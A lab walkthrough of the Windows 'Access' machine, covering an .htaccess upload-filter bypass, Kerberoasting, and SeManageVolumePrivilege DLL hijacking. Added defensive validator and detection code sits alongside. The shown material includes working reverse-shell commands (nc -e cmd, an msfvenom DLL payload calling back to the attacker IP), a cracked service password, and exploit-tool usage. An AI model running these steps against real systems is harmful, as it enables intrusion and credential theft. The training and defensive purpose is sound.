# Access

`.htaccess` `SeManageVolumePrivilege` `Upload file` `SPN` `kerberoast`

* Machine name: Access
* Difficulty: Intermediate
* OS: Windows

## Enumeration

### NMAP

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-22 06:33 EDT
Nmap scan report for 192.168.178.187
Host is up (0.034s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7)
|_http-title: Access The Event
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-08-22 10:38:32Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: access.offsec0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: access.offsec0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  msrpc         Microsoft Windows RPC
49704/tcp open  msrpc         Microsoft Windows RPC
49802/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: SERVER; OS: Windows; CPE: cpe:/o:microsoft:windows
```

We have a domain name: access.offsec

### HTTP (80)

Let's look for interesting directories.

```
┌──(kali㉿kali)-[~]
└─$ dirsearch -u http://192.168.178.187/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET
Threads: 25 | Wordlist size: 11460

Output File: /home/kali/reports/http_192.168.178.187/__24-08-22_06-34-49.txt

Target: http://192.168.178.187/

[06:34:49] Starting: 
[06:34:50] 403 -  304B  - /%3f/
[06:34:50] 403 -  304B  - /%C0%AE%C0%AE%C0%AF
[06:34:50] 403 -  304B  - /%ff
[06:34:51] 403 -  304B  - /.htaccess.bak1
[06:34:51] 403 -  304B  - /.htaccess.orig
[06:34:51] 403 -  304B  - /.ht_wsr.txt
[06:34:51] 403 -  304B  - /.htaccess_extra
[06:34:51] 403 -  304B  - /.htaccess_sc
[06:34:51] 403 -  304B  - /.htaccess.save
[06:34:51] 403 -  304B  - /.htaccess.sample
[06:34:51] 403 -  304B  - /.htaccessBAK
[06:34:51] 403 -  304B  - /.htaccess_orig
[06:34:51] 403 -  304B  - /.htaccessOLD
[06:34:51] 403 -  304B  - /.htaccessOLD2
[06:34:51] 403 -  304B  - /.htm
[06:34:51] 403 -  304B  - /.html
[06:34:51] 403 -  304B  - /.htpasswd_test
[06:34:51] 403 -  304B  - /.htpasswds
[06:34:51] 403 -  304B  - /.httr-oauth
[06:34:58] 301 -  343B  - /assets  ->  http://192.168.178.187/assets/
[06:34:58] 200 -    2KB - /assets/
[06:35:00] 403 -  304B  - /cgi-bin/
[06:35:00] 200 -    2KB - /cgi-bin/printenv.pl
[06:35:04] 301 -  342B  - /forms  ->  http://192.168.178.187/forms/
[06:35:04] 503 -  404B  - /examples/jsp/%252e%252e/%252e%252e/manager/html/
[06:35:04] 503 -  404B  - /examples/jsp/index.html
[06:35:04] 503 -  404B  - /examples/servlet/SnoopServlet
[06:35:04] 503 -  404B  - /examples
[06:35:04] 503 -  404B  - /examples/websocket/index.xhtml
[06:35:04] 503 -  404B  - /examples/servlets/servlet/RequestHeaderExample
[06:35:04] 503 -  404B  - /examples/
[06:35:04] 503 -  404B  - /examples/servlets/servlet/CookieExample
[06:35:04] 503 -  404B  - /examples/servlets/index.html
[06:35:04] 503 -  404B  - /examples/jsp/snp/snoop.jsp
[06:35:05] 403 -  304B  - /index.php::$DATA
[06:35:10] 403 -  423B  - /phpmyadmin
[06:35:11] 403 -  423B  - /phpmyadmin/doc/html/index.html
[06:35:11] 403 -  423B  - /phpmyadmin/
[06:35:11] 403 -  423B  - /phpmyadmin/docs/html/index.html
[06:35:11] 403 -  423B  - /phpmyadmin/ChangeLog
[06:35:11] 403 -  423B  - /phpmyadmin/phpmyadmin/index.php
[06:35:11] 403 -  423B  - /phpmyadmin/index.php
[06:35:11] 403 -  423B  - /phpmyadmin/scripts/setup.php
[06:35:11] 403 -  423B  - /phpmyadmin/README
[06:35:13] 403 -  423B  - /server-info
[06:35:13] 403 -  423B  - /server-status/
[06:35:13] 403 -  423B  - /server-status
[06:35:17] 403 -  304B  - /Trace.axd::$DATA
[06:35:17] 200 -  988B  - /uploads/
[06:35:17] 301 -  344B  - /uploads  ->  http://192.168.178.187/uploads/
[06:35:19] 403 -  304B  - /web.config::$DATA
[06:35:19] 403 -  423B  - /webalizer
[06:35:19] 403 -  423B  - /webalizer/

Task Completed

```

/uploads could be useful.

When we try to buy a ticket:

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FCL3qBxKFv7YNlh9qazTT%2F2c9c2eb11d46223643eab9109a78ea6f.png?alt=media&#x26;token=46ec1ab9-cfb1-49f2-a577-ba0b544ed78f" alt=""><figcaption></figcaption></figure>

We tried uploading a GIF and it worked; we found it again under /uploads.

Now let's try to get a shell.

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FopV4K7a1gBOBoNETr8iX%2F0a09f3ab6b673dc4234197c9f4b8b492.png?alt=media&#x26;token=21397834-f9aa-4369-b1a3-0dae38351975" alt=""><figcaption></figcaption></figure>

## Initial Access

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2F3TbX5tHMLXjwJASlb0ug%2Fb41c33c33b8c3949ded4d3a583c8b2ef.png?alt=media&#x26;token=5c5515da-5001-4077-adbc-365b7b0adf6b" alt=""><figcaption></figcaption></figure>

A simple modification in Burp Suite works: we changed the .php extension to .gif. The file cannot execute, but we have a lead, and we know we just have to play with file extensions.

Simply removing the extension works, and so does URL-encoding the dot of the extension.

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FgxvG7ASpdLjeMavnOXWU%2F568060d6360677ca4c5cc1377b8b2b7a.png?alt=media&#x26;token=d1af4c04-61d4-423d-adbd-ce588647524c" alt=""><figcaption></figcaption></figure>

However, we still can't execute commands.

Let's dig deeper.

{% embed url="https://thibaud-robin.fr/articles/bypass-filter-upload/" %}

We'll upload a .htaccess file that makes PHP code execute for an extension of our choice, here "php16":

```
┌──(kali㉿kali)-[~]
└─$ echo "AddType application/x-httpd-php .php16" > .htaccess
```

Now, if we upload shell.php16, the PHP code really does execute. Two options are open to us:

* 1: inject the base64 PowerShell payload into the cmd parameter (via the input bar or the URL)
* 2: upload a reverse shell directly (Ivan Sincek)

```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 135 
listening on [any] 135 ...
connect to [192.168.45.189] from (UNKNOWN) [192.168.178.187] 51564
SOCKET: Shell has connected! PID: 4592
Microsoft Windows [Version 10.0.17763.2746]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\uploads>whoami
access\svc_apache

```
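The upload filter on this site was beaten three ways in the steps above: dropping the extension, percent-encoding the dot, and uploading a `.htaccess` that maps a new extension to the PHP handler. The Python validator below is an added example, not code from the original write-up or from the lab application; it shows the server-side checks that close each of those paths (decode before checking, allow-list of extensions with matching magic bytes, reject dotfiles and NTFS stream syntax, never store under the client-supplied name). The extension list and the random storage naming are assumptions about what a ticket form like this one needs.

```python
import re
import secrets
import urllib.parse

# Extensions the ticket form legitimately needs (assumption: it only needs images).
ALLOWED_EXTENSIONS = {"gif", "png", "jpg", "jpeg"}

# Leading bytes each allowed type must start with, so the body has to match the name.
MAGIC = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}


def validate_upload(filename, content):
    """Return (accepted, reason, stored_name).

    stored_name is the name the file should be saved under. It never reuses
    the client-supplied name, so whatever extension the client chose cannot
    reach the web server's handler mapping.
    """
    # Decode percent-encoding before any check: a filter that inspects the raw
    # name is bypassed by 'shell%2Ephp'.
    name = urllib.parse.unquote(filename)
    # Strip any directory part, on both separator styles.
    name = re.split(r"[\\/]", name)[-1]
    # NUL bytes and NTFS stream syntax ('shell.php::$DATA') are never legitimate.
    if "\x00" in name or ":" in name:
        return False, "illegal character in filename", None
    # Dotfiles cover .htaccess/.htpasswd, which Apache reads as configuration.
    if name.startswith("."):
        return False, "hidden or configuration filename", None
    base, dot, ext = name.rpartition(".")
    if not dot or not base:
        # A bare name with no extension is exactly the 'remove the extension' trick.
        return False, "no extension", None
    ext = ext.lower()
    # Allow-list, never deny-list: 'php16', 'phtml', 'phar' all fail here.
    if ext not in ALLOWED_EXTENSIONS:
        return False, "extension '%s' not allowed" % ext, None
    if not content.startswith(MAGIC[ext]):
        return False, "content does not match extension", None
    # Random server-side name: 'shell.php.gif' becomes '<hex>.gif', so a
    # multiple-extension handler match on the original name is impossible.
    return True, "ok", "%s.%s" % (secrets.token_hex(16), ext)


if __name__ == "__main__":
    for fname, body in [("ticket.gif", b"GIF89a\x01"), ("shell%2Ephp", b"<?php"),
                        ("shell", b"<?php"), (".htaccess", b"AddType x .php16")]:
        print(fname, validate_upload(fname, body))
```

A file that passes these checks can still carry PHP text inside a valid GIF, so the Apache side matters as much as the validator: the upload directory needs `AllowOverride None` so a `.htaccess` is ignored even if one slips through, and the PHP engine should be disabled for that directory (`php_admin_flag engine off` under mod_php) so nothing stored there is ever executed.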

## Privilege Escalation

Digging around and running winPEAS, we find nothing interesting.

Let's try a Kerberoast attack with Rubeus.

```
PS C:\xampp\htdocs\uploads> ./rubeus.exe kerberoast /outfile:hash.txt

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0 


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target Domain          : access.offsec
[*] Searching path 'LDAP://SERVER.access.offsec/DC=access,DC=offsec' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'

[*] Total kerberoastable users : 1


[*] SamAccountName         : svc_mssql
[*] DistinguishedName      : CN=MSSQL,CN=Users,DC=access,DC=offsec
[*] ServicePrincipalName   : MSSQLSvc/DC.access.offsec
[*] PwdLastSet             : 5/21/2022 5:33:45 AM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash written to C:\xampp\htdocs\uploads\hash.txt

[*] Roasted hashes written to : C:\xampp\htdocs\uploads\hash.txt
PS C:\xampp\htdocs\uploads> type hash.txt
$krb5tgs$23$*svc_mssql$access.offsec$MSSQLSvc/DC.access.offsec@access.offsec[...hash truncated...]
```

We copy the file to our machine and try to crack it.

```
┌──(kali㉿kali)-[~/oscp]
└─$ john hash.txt                                           
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 5 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
trustno1         (?)     
1g 0:00:00:00 DONE 2/3 (2024-08-22 12:35) 25.00g/s 32000p/s 32000c/s 32000C/s 123456..burton
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```
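The Rubeus output above shows why this ticket was crackable: svc_mssql only advertised RC4_HMAC, so the TGS came back with etype 23 and john could attack it offline with a wordlist. On the domain controller every such request leaves a Security event 4769 whose `TicketEncryptionType` is 0x17. The detector below is an added example, not part of the original write-up; it runs over a constructed batch of 4769 records (flattened to one key=value line each, an assumed format) and raises on two signals: a legacy-etype service ticket for a user-account SPN, and one requester collecting tickets for several distinct user SPNs in a short window. The sample lines, the five-minute window and the threshold of two are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Security event 4769 (service ticket requested) records,
# one per line, using the real 4769 field names. Not captured from the lab.
SAMPLE_4769 = """\
2024-08-22T10:41:02Z TargetUserName=svc_apache@ACCESS.OFFSEC ServiceName=svc_mssql TicketEncryptionType=0x17 IpAddress=::ffff:192.168.178.187
2024-08-22T10:41:02Z TargetUserName=svc_apache@ACCESS.OFFSEC ServiceName=SERVER$ TicketEncryptionType=0x12 IpAddress=::ffff:192.168.178.187
2024-08-22T10:41:03Z TargetUserName=alice@ACCESS.OFFSEC ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=::ffff:192.168.178.50
2024-08-22T10:41:05Z TargetUserName=bob@ACCESS.OFFSEC ServiceName=svc_mssql TicketEncryptionType=0x12 IpAddress=::ffff:192.168.178.51
2024-08-22T10:41:06Z TargetUserName=svc_apache@ACCESS.OFFSEC ServiceName=svc_backup TicketEncryptionType=0x17 IpAddress=::ffff:192.168.178.187
"""

# Ticket encryption types an AES-capable domain should no longer issue:
# 0x1 DES-CBC-CRC, 0x3 DES-CBC-MD5, 0x17 RC4-HMAC (the etype 23 john cracked above).
LEGACY_ETYPES = {"0x1", "0x3", "0x17"}


def parse_4769(line):
    """Turn one constructed log line into a dict of 4769 fields plus a 'time'."""
    ts, _, rest = line.partition(" ")
    fields = dict(kv.split("=", 1) for kv in rest.split())
    fields["time"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    return fields


def is_user_spn(service_name):
    # Computer accounts end in '$' and krbtgt is the KDC itself; neither has a
    # human-chosen password, so tickets for them are not the roasting target.
    return not service_name.endswith("$") and service_name.lower() != "krbtgt"


def kerberoast_alerts(log_text, burst_threshold=2, window=timedelta(minutes=5)):
    """Return a list of (requester, reason) alerts over the given 4769 lines."""
    events = [parse_4769(l) for l in log_text.splitlines() if l.strip()]
    alerts = []
    per_requester = defaultdict(list)
    for ev in events:
        if not is_user_spn(ev["ServiceName"]):
            continue
        requester = ev["TargetUserName"]
        per_requester[requester].append(ev)
        # Signal 1: a downgraded ticket for an SPN owned by a user account.
        if ev["TicketEncryptionType"] in LEGACY_ETYPES:
            alerts.append((requester, "legacy etype %s for SPN owner %s"
                           % (ev["TicketEncryptionType"], ev["ServiceName"])))
    # Signal 2: one requester sweeping several user SPNs inside one window,
    # which is what an LDAP-driven roasting tool does regardless of etype.
    for requester, evs in per_requester.items():
        evs.sort(key=lambda e: e["time"])
        for i, first in enumerate(evs):
            services = {e["ServiceName"] for e in evs[i:]
                        if e["time"] - first["time"] <= window}
            if len(services) >= burst_threshold:
                alerts.append((requester, "%d distinct user SPNs requested within %s"
                               % (len(services), window)))
                break
    return alerts


if __name__ == "__main__":
    for requester, reason in kerberoast_alerts(SAMPLE_4769):
        print(requester, "->", reason)
```

The durable fix is on the account side rather than in the SIEM: set `msDS-SupportedEncryptionTypes` on service accounts to AES only and give them long random passwords (or move them to group managed service accounts), so a roasted ticket is not brute-forceable; once that is done, an RC4 service ticket for a user SPN becomes a rare event worth paging on instead of background noise.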

We have the password, so let's try to run commands with RunasCs.

```
PS C:\xampp\htdocs\uploads> ./runas.exe svc_mssql trustno1 "cmd /c whoami /all"
[*] Warning: The logon for user 'svc_mssql' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.


USER INFORMATION
----------------

User Name        SID                                         
================ ============================================
access\svc_mssql S-1-5-21-537427935-490066102-1511301751-1104


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes                                        
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Group used for deny only                          
NT AUTHORITY\INTERACTIVE                   Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192                                                    


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                      State   
============================= ================================ ========
SeMachineAccountPrivilege     Add workstations to domain       Disabled
SeChangeNotifyPrivilege       Bypass traverse checking         Enabled 
SeManageVolumePrivilege       Perform volume maintenance tasks Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set   Disabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
```

We can run commands, and we can see that we have a new privilege: `SeManageVolumePrivilege`

We'll launch a reverse shell to connect as `svc_mssql`. First we download nc.exe onto the target.

```
PS C:\xampp\htdocs\uploads> ./runas.exe svc_mssql trustno1 "./nc.exe 192.168.45.189 135 -e cmd"
```

```
┌──(kali㉿kali)-[~/]
└─$ nc -lnvp 135 
listening on [any] 135 ...
 connect to [192.168.45.189] from (UNKNOWN) [192.168.178.187] 51840
Microsoft Windows [Version 10.0.17763.2746]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
 whoami
access\svc_mssql
```

{% embed url="https://medium.com/@raphaeltzy13/exploiting-semanagevolumeprivilege-with-dll-hijacking-windows-privilege-escalation-1a4f28372d37" %}

```
┌──(kali㉿kali)-[~]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.189 LPORT=1337 -f dll -o tzres.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 9216 bytes
Saved as: tzres.dll


PS C:\Users\svc_mssql\Desktop> iwr -uri http://192.168.45.189/Tools/SeManageVolumeExploit.exe -Outfile smve.exe
PS C:\Users\svc_mssql\Desktop> ./smve.exe
./smve.exe
Entries changed: 926
DONE 
PS C:\windows\system32\wbem> iwr -uri http://192.168.45.189/tzres.dll -Outfile tzres.dll
```

```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1337                    
listening on [any] 1337 ...
connect to [192.168.45.189] from (UNKNOWN) [192.168.178.187] 51872
Microsoft Windows [Version 10.0.17763.2746]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\network service
```

We're admin!
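The last step above drops a DLL named tzres.dll under `C:\Windows\System32\wbem` from an account that `SeManageVolumePrivilege` let write there, and the callback arrives as NETWORK SERVICE. On the defensive side the observable is an unexpected principal creating a DLL under a protected system directory, which Sysmon records as Event ID 11 (FileCreate). The detector below is an added example, not code from the write-up or from the linked article; it runs over constructed Sysmon records (an assumed field subset: UtcTime, Image, TargetFilename, User) and flags DLL creations under System32 or SysWOW64 by anyone other than SYSTEM or TrustedInstaller. The trusted-writer set and the directory list are assumptions to tune per environment.

```python
import ntpath

# Constructed Sysmon Event ID 11 (FileCreate) records; not captured from the lab.
SAMPLE_SYSMON_11 = [
    {"UtcTime": "2024-08-22 10:55:01.120",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "TargetFilename": "C:\\Windows\\System32\\wbem\\tzres.dll",
     "User": "ACCESS\\svc_mssql"},
    {"UtcTime": "2024-08-22 10:50:12.004",
     "Image": "C:\\Windows\\servicing\\TrustedInstaller.exe",
     "TargetFilename": "C:\\Windows\\System32\\kernel32.dll",
     "User": "NT AUTHORITY\\SYSTEM"},
    {"UtcTime": "2024-08-22 10:53:40.771",
     "Image": "C:\\xampp\\apache\\bin\\httpd.exe",
     "TargetFilename": "C:\\xampp\\htdocs\\uploads\\smve.exe",
     "User": "ACCESS\\svc_apache"},
    {"UtcTime": "2024-08-22 10:54:09.300",
     "Image": "C:\\Windows\\System32\\msiexec.exe",
     "TargetFilename": "C:\\Program Files\\SomeApp\\app.dll",
     "User": "NT AUTHORITY\\SYSTEM"},
]

# Directories whose DLLs are on the default search path of privileged processes.
# Lower-cased with a trailing separator so 'system32extra' cannot match by prefix.
PROTECTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# Principals that legitimately service these directories (assumption; extend as needed).
TRUSTED_WRITERS = {"nt authority\\system", "nt service\\trustedinstaller"}


def flag_system_dll_write(event):
    """Return an alert string for a suspicious DLL creation, else None."""
    target = event["TargetFilename"].lower()
    user = event["User"].lower()
    # Only library files matter for a search-order hijack; compare case-insensitively
    # because NTFS will happily store 'TZRES.DLL'.
    if not target.endswith(".dll"):
        return None
    if not target.startswith(PROTECTED_DIRS):
        return None
    if user in TRUSTED_WRITERS:
        return None
    return "%s created %s in %s via %s at %s" % (
        event["User"],
        ntpath.basename(event["TargetFilename"]),
        ntpath.dirname(event["TargetFilename"]),
        ntpath.basename(event["Image"]),
        event["UtcTime"],
    )


def scan(events):
    """Run the check over a batch of Sysmon 11 records and keep the hits."""
    return [a for a in (flag_system_dll_write(e) for e in events) if a]


if __name__ == "__main__":
    for alert in scan(SAMPLE_SYSMON_11):
        print(alert)
```

The preventive control sits one step earlier than the DLL write: "Perform volume maintenance tasks" (the user right behind SeManageVolumePrivilege) belongs to Administrators by default and has no business on a service account such as svc_mssql, so auditing User Rights Assignment in Group Policy for that right, and removing it from service accounts, takes away the foothold this chain depended on.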
